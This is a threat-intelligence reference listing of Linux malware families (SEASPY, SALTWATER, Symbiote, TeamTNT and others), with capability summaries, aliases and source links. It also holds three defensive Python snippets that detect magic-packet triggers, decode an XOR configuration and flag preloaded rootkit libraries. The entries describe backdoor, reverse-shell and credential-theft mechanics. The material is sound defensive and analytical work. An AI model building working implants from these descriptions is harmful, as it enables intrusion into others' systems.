The tag is: misp-galaxy:malpedia="RotaJakiro"

RotaJakiro is also known as:

Table 2454. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.rotajakiro

https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/

https://www.domaintools.com/resources/blog/domaintools-and-digital-archeology-a-look-at-rotajakiro

https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/

Royal Ransom (ELF)

According to Trendmicro, Royal ransomware was first observed in September 2022, and the threat actors behind it are believed to be seasoned cybercriminals who used to be part of Conti Team One.

The tag is: misp-galaxy:malpedia="Royal Ransom (ELF)"

Royal Ransom (ELF) is also known as:

  • Royal

  • Royal_unix

Table 2455. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.royal_ransom

https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/

https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html

https://unit42.paloaltonetworks.com/royal-ransomware/

SALTWATER

According to Mandiant, SALTWATER is a module for the Barracuda SMTP daemon (bsmtpd) that has backdoor functionality. SALTWATER can upload or download arbitrary files, execute commands, and has proxy and tunneling capabilities. The backdoor is implemented using hooks on the send, recv and close syscalls via the third-party kubo/funchook hooking library, and amounts to five components, most of which are referred to as "Channels" within the binary. In addition to providing backdoor and proxying capabilities, these components exhibit classic backdoor functionality.

The tag is: misp-galaxy:malpedia="SALTWATER"

SALTWATER is also known as:

Table 2457. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.saltwater

https://www.mandiant.com/resources/blog/chinese-espionage-tactics

https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally

SEASPY

According to CISA, this malware is a persistent backdoor that masquerades as a legitimate Barracuda Networks service. The malware is designed to listen for commands received from the threat actor's command-and-control server through TCP packets. When executed, the malware uses a libpcap sniffer to monitor traffic for a magic packet on TCP port 25 (SMTP) and TCP port 587. It checks each captured network packet for a hard-coded string. When the right sequence of packets is captured, it establishes a TCP reverse shell to the C2 server for further exploitation. This allows the threat actor to execute arbitrary commands on the compromised system. The malware is based on an open-source backdoor program named "cd00r".
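The trigger mechanism described above (a passive sniffer that only reacts when a segment to port 25 or 587 carries a hard-coded marker) can be modelled offline. The following Python is an added example, not SEASPY or cd00r code and not part of CISA's analysis: it decodes raw Ethernet/IPv4/TCP frames the way a libpcap callback receives them and flags segments to the watched ports whose payload contains a marker. The marker value `ASSUMED_MAGIC` is a placeholder, since the real hard-coded string is not reproduced on this page, and the frames are constructed inline rather than captured.

```python
import socket
import struct
from typing import Dict, List, Optional, Tuple

WATCHED_PORTS = {25, 587}          # SMTP and submission ports named in the CISA report
ASSUMED_MAGIC = b"MAGIC-TRIGGER"   # placeholder only; the real hard-coded string is not on this page


def parse_frame(frame: bytes) -> Optional[Tuple[str, str, int, int, bytes]]:
    """Decode Ethernet/IPv4/TCP headers; return (src, dst, sport, dport, payload) or None for anything else."""
    if len(frame) < 14 + 20 + 20:
        return None
    if struct.unpack("!H", frame[12:14])[0] != 0x0800:        # EtherType must be IPv4
        return None
    ip = frame[14:]
    if ip[0] >> 4 != 4 or ip[9] != 6:                          # IP version 4, protocol TCP
        return None
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    if ihl < 20 or total_len < ihl + 20 or len(ip) < total_len:
        return None
    src = socket.inet_ntoa(ip[12:16])
    dst = socket.inet_ntoa(ip[16:20])
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4                              # TCP header length incl. options
    if data_off < 20 or data_off > len(tcp):
        return None
    return src, dst, sport, dport, tcp[data_off:]


def find_magic_packets(frames, magic: bytes = ASSUMED_MAGIC, ports=WATCHED_PORTS) -> List[Dict]:
    """One record per TCP segment to a watched port whose payload carries the marker."""
    hits = []
    for i, frame in enumerate(frames):
        parsed = parse_frame(frame)
        if parsed is None:
            continue
        src, dst, sport, dport, payload = parsed
        if dport in ports and magic in payload:
            hits.append({"index": i, "src": src, "dst": dst, "sport": sport, "dport": dport})
    return hits


def build_frame(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Construct a test frame (constructed data; checksums are left zero, which a sniffer does not verify)."""
    eth = bytes.fromhex("020000000001") + bytes.fromhex("020000000002") + b"\x08\x00"
    tcp_hdr = struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, 0x18, 65535, 0, 0)
    total_len = 20 + len(tcp_hdr) + len(payload)
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, 6, 0,
                         socket.inet_aton(src), socket.inet_aton(dst))
    return eth + ip_hdr + tcp_hdr + payload


# Constructed traffic: ordinary SMTP, the trigger on the submission port, and the marker on a port the sniffer ignores.
SAMPLE_FRAMES = [
    build_frame("10.0.0.5", "10.0.0.9", 40000, 25, b"EHLO mail.example.invalid\r\n"),
    build_frame("10.0.0.5", "10.0.0.9", 40001, 587, b"junk" + ASSUMED_MAGIC + b"junk"),
    build_frame("10.0.0.5", "10.0.0.9", 40002, 443, ASSUMED_MAGIC),
]

if __name__ == "__main__":
    for hit in find_magic_packets(SAMPLE_FRAMES):
        print(f"trigger candidate: {hit['src']}:{hit['sport']} -> {hit['dst']}:{hit['dport']} (frame {hit['index']})")
```

Run against real captures by feeding the raw link-layer bytes of each packet into `find_magic_packets`. Note what the sniffer design implies for defenders: the trigger segment never needs to complete a TCP handshake with the mail daemon, so it will not appear in SMTP logs, and the only host-side artefacts are the process holding a packet socket and the outbound reverse shell it opens afterwards.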

The tag is: misp-galaxy:malpedia="SEASPY"

SEASPY is also known as:

Table 2460. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.seaspy

https://www.cisa.gov/news-events/analysis-reports/ar23-209b

https://www.mandiant.com/resources/blog/chinese-espionage-tactics

https://www.cisa.gov/news-events/alerts/2023/07/28/cisa-releases-malware-analysis-reports-barracuda-backdoors

https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally

Shishiga

The tag is: misp-galaxy:malpedia="Shishiga"

Shishiga is also known as:

Table 2462. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.shishiga

https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/

SimpleTea (ELF)

SimpleTea for Linux is an HTTP(S) RAT.

It was discovered in Q1 2023 as an instance of the Lazarus group’s Operation DreamJob campaign for Linux. It was a payload downloaded in an execution chain which started with an HSBC-themed job offer lure. It shared the same C&C server as payloads from the 3CX incident around the same time.

It’s an object-oriented project, which does not run on Linux distributions without a graphical user interface, and decrypts its configuration from /home/%user%/.config/apdl.cf using 0x7E as the XOR key. It uses AES-GCM for encryption and decryption of its network traffic.

It supports basic commands that include operations on the victim's filesystem, manipulation of its configuration, file exfiltration (via ZIP archives), and the download and execution of additional tools from the attacker's arsenal. The commands are indexed by 16-bit integers, starting with the value 0x27C3.

SimpleTea for Linux seems like an updated version of BadCall for Linux, rewritten from C to C++, as there are similarities in class names and function names between the two.
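Two details above are directly usable by an analyst: the configuration at /home/%user%/.config/apdl.cf is protected with a single-byte XOR key of 0x7E, and command identifiers are 16-bit integers starting at 0x27C3. The following Python is an added example, not SimpleTea code and not ESET's tooling: it decodes a configuration blob with that key, recovers the key by brute force when it is not known (a generalisation beyond the page), and maps a wire command index to a zero-based slot. The NUL-separated configuration layout, the little-endian byte order of the command index, and the sample data are all assumptions made for the example.

```python
import string
import struct
from typing import List, Optional, Tuple

XOR_KEY = 0x7E                                   # key stated in the description
COMMAND_BASE = 0x27C3                            # first command index stated in the description
CONFIG_PATH = "/home/%user%/.config/apdl.cf"     # path stated in the description


def xor_bytes(blob: bytes, key: int = XOR_KEY) -> bytes:
    """Single-byte XOR; the same function encodes and decodes."""
    return bytes(b ^ key for b in blob)


def parse_config(decoded: bytes) -> List[str]:
    """Assumed layout: NUL-separated UTF-8 strings (the real field layout is not on this page)."""
    return [f.decode("utf-8", "replace") for f in decoded.split(b"\x00") if f]


def printable_ratio(data: bytes) -> float:
    printable = set(string.printable.encode())
    return sum(b in printable for b in data) / max(len(data), 1)


def recover_xor_key(blob: bytes, crib: bytes = b"https://") -> Optional[int]:
    """Try all 256 single-byte keys; accept the first whose plaintext contains the crib and is mostly printable."""
    for key in range(256):
        plain = xor_bytes(blob, key)
        if crib in plain and printable_ratio(plain) > 0.9:
            return key
    return None


def command_slot(index: int, base: int = COMMAND_BASE) -> Optional[int]:
    """Zero-based position of a wire command index, or None if it precedes the base."""
    offset = index - base
    return offset if 0 <= offset <= 0xFFFF - base else None


def decode_command(frame: bytes) -> Tuple[int, bytes]:
    """Assumed wire format: 16-bit little-endian command index followed by its arguments."""
    if len(frame) < 2:
        raise ValueError("frame too short for a command index")
    index = struct.unpack("<H", frame[:2])[0]
    slot = command_slot(index)
    if slot is None:
        raise ValueError(f"command index 0x{index:04X} is below the base 0x{COMMAND_BASE:04X}")
    return slot, frame[2:]


# Constructed sample configuration (not a real SimpleTea configuration).
SAMPLE_PLAIN = (b"https://c2.example.invalid/api\x00"
                b"https://backup.example.invalid/api\x00"
                b"victim-id-1234")
SAMPLE_ENCODED = xor_bytes(SAMPLE_PLAIN)

if __name__ == "__main__":
    key = recover_xor_key(SAMPLE_ENCODED)
    print(f"recovered key: 0x{key:02X}")
    for field in parse_config(xor_bytes(SAMPLE_ENCODED, key)):
        print("config field:", field)
    print("command slot, args:", decode_command(b"\xC5\x27payload"))
```

On a live host, read the file named by `CONFIG_PATH` (with the user's home directory substituted) and pass its bytes to `xor_bytes`; the printable-ratio check in `recover_xor_key` is what tells you the key actually fits rather than merely producing the crib by coincidence.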

The tag is: misp-galaxy:malpedia="SimpleTea (ELF)"

SimpleTea (ELF) is also known as:

  • SimplexTea

Table 2465. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.simpletea

https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

SLAPSTICK

According to FireEye, SLAPSTICK is a Solaris PAM backdoor that grants a user access to the system with a secret, hard-coded password.

The tag is: misp-galaxy:malpedia="SLAPSTICK"

SLAPSTICK is also known as:

Table 2466. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.slapstick

https://www.mandiant.com/resources/unc2891-overview

https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html

SnappyTCP

According to PwC, SnappyTCP is a simple reverse shell for Linux/Unix systems, with variants for plaintext and TLS communication. SeaTurtle has used SnappyTCP at least between 2021 and 2023.

The tag is: misp-galaxy:malpedia="SnappyTCP"

SnappyTCP is also known as:

Table 2467. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.snappy_tcp

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html

https://www.huntandhackett.com/blog/turkish-espionage-campaigns

Spamtorte

The tag is: misp-galaxy:malpedia="Spamtorte"

Spamtorte is also known as:

Table 2469. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.spamtorte

https://cis.verint.com/2016/11/08/spamtorte-version-2/

SpeakUp

The tag is: misp-galaxy:malpedia="SpeakUp"

SpeakUp is also known as:

Table 2470. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.speakup

https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/

SprySOCKS

The tag is: misp-galaxy:malpedia="SprySOCKS"

SprySOCKS is also known as:

Table 2473. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.spry_socks

https://www.trendmicro.com/en_us/research/23/i/earth-lusca-employs-new-linux-backdoor.html

STEELCORGI

According to FireEye, STEELCORGI is a packer for Linux ELF files that makes use of execution guardrails by sourcing decryption key material from environment variables.

The tag is: misp-galaxy:malpedia="STEELCORGI"

STEELCORGI is also known as:

Table 2476. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.steelcorgi

https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/

https://www.mandiant.com/resources/unc2891-overview

https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html

https://yoroi.company/research/opening-steelcorgi-a-sophisticated-apt-swiss-army-knife/

Sunless

The tag is: misp-galaxy:malpedia="Sunless"

Sunless is also known as:

Table 2477. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.sunless

https://www.securityartwork.es/2019/01/09/analisis-de-linux-sunless/

sustes miner

Sustes malware doesn't infect victims by itself (it's not a worm) but is spread through exploitation and brute-force activity, with a special focus on IoT devices and Linux servers. The initial infection stage is a custom wget run directly on the victim machine, followed by a simple /bin/bash mr.sh. The script is a simple bash script that drops and executes additional software.

The tag is: misp-galaxy:malpedia="sustes miner"

sustes miner is also known as:

Table 2478. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.sustes

https://marcoramilli.com/2018/09/20/sustes-malware-cpu-for-monero/

Suterusu

The tag is: misp-galaxy:malpedia="Suterusu"

Suterusu is also known as:

  • HCRootkit

Table 2479. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.suterusu

https://www.lacework.com/blog/hcrootkit-sutersu-linux-rootkit-analysis/

Symbiote

Malware capable of capturing credentials and enabling backdoor access, implemented as a userland rootkit. It uses three methods to hide its network activity, by hooking and hijacking 1) fopen/fopen64, 2) eBPF and 3) a set of libpcap functions.
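A userland rootkit that hooks libc functions such as fopen/fopen64 in other processes is injected through the dynamic loader's preload mechanism (/etc/ld.so.preload or LD_PRELOAD), so the library must be mapped into the processes it lies to. The following Python is an added example, not Symbiote code and not from the BlackBerry or Intezer analyses: it parses a /proc/<pid>/maps listing and the preload configuration and flags shared objects that are preloaded, live outside the usual library directories, or have been deleted while still mapped. The trusted-directory list and the sample maps and preload contents are constructed assumptions.

```python
import os
import re
from typing import Dict, List

# Assumption: directories a stock distribution installs shared objects into; extend for local builds.
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/")
MAPS_LINE = re.compile(r"^\S+ \S+ \S+ \S+ \S+\s+(/.*)$")   # address perms offset dev inode path


def mapped_objects(maps_text: str) -> List[str]:
    """Distinct file-backed mappings from a /proc/<pid>/maps listing, in first-seen order."""
    seen: List[str] = []
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line)
        if m and m.group(1) not in seen:
            seen.append(m.group(1))
    return seen


def preload_entries(preload_text: str) -> List[str]:
    """Libraries named in /etc/ld.so.preload (one per line, '#' comments ignored)."""
    return [l.strip() for l in preload_text.splitlines() if l.strip() and not l.strip().startswith("#")]


def is_shared_object(path: str) -> bool:
    return path.endswith(".so") or ".so." in os.path.basename(path)


def suspicious_objects(maps_text: str, preload_text: str = "", ld_preload_env: str = "") -> Dict[str, List[str]]:
    """Map each suspect path to the reasons it was flagged."""
    preloaded = set(preload_entries(preload_text)) | {p for p in re.split(r"[:\s]+", ld_preload_env) if p}
    findings: Dict[str, List[str]] = {}
    mapped = mapped_objects(maps_text)
    for path in mapped:
        file_path = path.replace(" (deleted)", "")
        reasons = []
        if file_path in preloaded:
            reasons.append("listed as a preload library")
        if is_shared_object(file_path):
            if not file_path.startswith(TRUSTED_LIB_DIRS):
                reasons.append("shared object outside trusted library directories")
            if path.endswith("(deleted)"):
                reasons.append("backing file deleted while still mapped")
        if reasons:
            findings[path] = reasons
    # A preload entry that is not mapped here still deserves a look: it is injected into every other process.
    mapped_files = {p.replace(" (deleted)", "") for p in mapped}
    for lib in sorted(preloaded):
        if lib not in mapped_files:
            findings[lib] = ["preload entry not mapped in the inspected process"]
    return findings


def inspect_pid(pid: int) -> Dict[str, List[str]]:
    """Live check against /proc and /etc/ld.so.preload on the running host."""
    with open(f"/proc/{pid}/maps") as fh:
        maps_text = fh.read()
    try:
        with open("/etc/ld.so.preload") as fh:
            preload_text = fh.read()
    except FileNotFoundError:
        preload_text = ""
    return suspicious_objects(maps_text, preload_text, os.environ.get("LD_PRELOAD", ""))


# Constructed /proc/<pid>/maps excerpt and ld.so.preload contents (not taken from a real infection).
SAMPLE_MAPS = """\
5581c3a00000-5581c3a1e000 r--p 00000000 fd:01 1311 /usr/bin/sshd
7f2b1c000000-7f2b1c1c0000 r-xp 00000000 fd:01 4003 /usr/lib/x86_64-linux-gnu/libc.so.6
7f2b1c300000-7f2b1c310000 r-xp 00000000 fd:01 9911 /usr/lib/x86_64-linux-gnu/libpcap.so.1.10.1
7f2b1c400000-7f2b1c408000 r-xp 00000000 fd:01 7777 /dev/shm/.x/libhelper.so
7f2b1c500000-7f2b1c504000 r-xp 00000000 00:00 0 [vdso]
7ffd1e000000-7ffd1e021000 rw-p 00000000 00:00 0 [stack]
"""
SAMPLE_PRELOAD = "/dev/shm/.x/libhelper.so\n"

if __name__ == "__main__":
    for path, reasons in suspicious_objects(SAMPLE_MAPS, SAMPLE_PRELOAD).items():
        print(path, "->", "; ".join(reasons))
```

The caveat is the one the description implies: a rootkit that hooks the libc calls this tool itself makes can filter what it reads from /proc and /etc. Treat a clean result from a live host as weak evidence, and prefer running the same parsing from a statically linked binary, over a memory image, or against the mounted disk of the suspect system.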

The tag is: misp-galaxy:malpedia="Symbiote"

Symbiote is also known as:

Table 2481. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.symbiote

https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/

https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/

https://www.trendmicro.com/en_us/research/23/g/detecting-bpfdoor-backdoor-variants-abusing-bpf-filters.html

https://blogs.blackberry.com/en/2022/06/symbiote-a-new-nearly-impossible-to-detect-linux-threat

https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote

TeamTNT

Since fall 2019, TeamTNT has been a well-known threat actor that targets *nix-based systems and misconfigured Docker container environments. It has constantly evolved its capabilities for its cloud-based cryptojacking operations and has shifted its focus to compromising Kubernetes clusters.

The tag is: misp-galaxy:malpedia="TeamTNT"

TeamTNT is also known as:

Table 2484. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt

https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool

https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf

https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials

https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment

https://www.trendmicro.com/en_us/research/21/l/more-tools-in-the-arsenal-how-teamtnt-used-compromised-docker-hu.html

https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera

https://unit42.paloaltonetworks.com/atoms/thieflibra/

https://unit42.paloaltonetworks.com/atoms/adept-libra/

https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/

https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked

https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

https://www.anomali.com/blog/inside-teamtnts-impressive-arsenal-a-look-into-a-teamtnt-server

https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/

https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/

https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/

https://www.uptycs.com/blog/team-tnt-deploys-malicious-docker-image-on-docker-hub-with-pentesting-tools

https://sysdig.com/blog/teamtnt-aws-credentials/

https://tolisec.com/active-crypto-mining-operation-by-teamtnt/

https://www.trendmicro.com/en_ae/research/21/k/teamtnt-upgrades-arsenal-refines-focus-on-kubernetes-and-gpu-env.html

https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/

https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf

https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf

Torii

The tag is: misp-galaxy:malpedia="Torii"

Torii is also known as:

Table 2487. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.torii

https://blog.avast.com/new-torii-botnet-threat-research

Trump Bot

The tag is: misp-galaxy:malpedia="Trump Bot"

Trump Bot is also known as:

Table 2488. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.trump_bot

http://paper.seebug.org/345/

tsh

The tag is: misp-galaxy:malpedia="tsh"

tsh is also known as:

Table 2490. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsh

https://github.com/creaktive/tsh

Tsunami (ELF)

The tag is: misp-galaxy:malpedia="Tsunami (ELF)"

Tsunami (ELF) is also known as:

  • Amnesia

  • Muhstik

  • Radiation

Table 2491. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks

https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/

https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775

http://get.cyberx-labs.com/radiation-report

https://www.lacework.com/meet-muhstik-iot-botnet-infecting-cloud-servers/

https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/

https://blog.aquasec.com/fileless-malware-container-security

https://tolisec.com/multi-vector-minertsunami-botnet-with-ssh-lateral-movement/

http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/

https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/

https://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134

https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039

https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt

https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers

https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/

https://www.fortinet.com/blog/threat-research/recent-attack-uses-vulnerability-on-confluence-server

https://asec.ahnlab.com/en/54647/

https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/

https://sysdig.com/blog/muhstik-malware-botnet-analysis/

https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/

https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf

Unidentified Linux 001

According to Cybereason, these scripts have been used in an ongoing campaign exploiting a widespread vulnerability in the Exim MTA, CVE-2019-10149. The attack leverages this week-old vulnerability to gain remote command execution on the target machine, searches the Internet for other machines to infect, and starts a cryptominer.

The tag is: misp-galaxy:malpedia="Unidentified Linux 001"

Unidentified Linux 001 is also known as:

Table 2494. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_001

https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability

Unidentified ELF 004

Implant used by APT31 on compromised SOHO infrastructure, tries to camouflage as a tool ("unifi-video") related to Ubiquiti UniFi surveillance cameras.

The tag is: misp-galaxy:malpedia="Unidentified ELF 004"

Unidentified ELF 004 is also known as:

Table 2495. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_004

https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/

Unidentified ELF 006 (Tox Backdoor)

Enables remote execution of scripts on a host, communicates via Tox.

The tag is: misp-galaxy:malpedia="Unidentified ELF 006 (Tox Backdoor)"

Unidentified ELF 006 (Tox Backdoor) is also known as:

Table 2497. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_006

https://www.uptycs.com/blog/is-tox-the-new-cc-method-for-coinminers

Hive (Vault 8)

The tag is: misp-galaxy:malpedia="Hive (Vault 8)"

Hive (Vault 8) is also known as:

Table 2498. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.vault8_hive

https://wikileaks.org/vault8/

https://github.com/infoskirmish/hive

VPNFilter

The tag is: misp-galaxy:malpedia="VPNFilter"

VPNFilter is also known as:

Table 2500. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/

https://blog.talosintelligence.com/2022/02/threat-advisory-cyclops-blink.html

https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter

https://blog.talosintelligence.com/2018/05/VPNFilter.html

https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected

https://i.blackhat.com/USA-19/Thursday/us-19-Doerr-The-Enemy-Within-Modern-Supply-Chain-Attacks.pdf

https://www.cisa.gov/uscert/ncas/alerts/aa22-054a

https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1

https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html

https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf

https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-054A%20New%20Sandworm%20Malware%20Cyclops%20Blink%20Replaces%20VPN%20Filter.pdf

https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html

https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games

https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks

https://blog.talosintelligence.com/2019/05/one-year-later-vpnfilter-catastrophe.html

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware

https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/

https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities

https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/

WatchBog

According to Intezer, this is a spreader module used by WatchBog. It is a dynamically linked ELF executable, compiled with Cython. C&C addresses are fetched from Pastebin, and C&C communication references a unique identification key per victim. It contains a BlueKeep scanner that reports positively scanned hosts to the C&C server (RC4 encrypted within SSL/TLS), and five exploits targeting Jira, Exim, Solr, Jenkins and Nexus Repository Manager 3.

The tag is: misp-galaxy:malpedia="WatchBog"

WatchBog is also known as:

Table 2501. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.watchbog

https://intezer.com/blog/linux/watching-the-watchbog-new-bluekeep-scanner-and-linux-exploits/

elf.wellmess

The tag is: misp-galaxy:malpedia="elf.wellmess"

elf.wellmess is also known as:

Table 2503. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess

https://blog.talosintelligence.com/2020/08/attribution-puzzle.html

https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

https://community.riskiq.com/article/541a465f/description

https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors

https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf

https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf

https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://us-cert.cisa.gov/ncas/alerts/aa21-116a

https://securelist.com/apt-trends-report-q2-2020/97937/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf

https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/

https://services.global.ntt/en-us/insights/blog/the-layered-infrastructure-operated-by-apt29

https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html

WHIRLPOOL

The tag is: misp-galaxy:malpedia="WHIRLPOOL"

WHIRLPOOL is also known as:

Table 2504. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.whirlpool

https://www.cisa.gov/news-events/analysis-reports/ar23-250a-0

Xaynnalc

The tag is: misp-galaxy:malpedia="Xaynnalc"

Xaynnalc is also known as:

Table 2510. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.xaynnalc

https://twitter.com/michalmalik/status/846368624147353601

xdr33

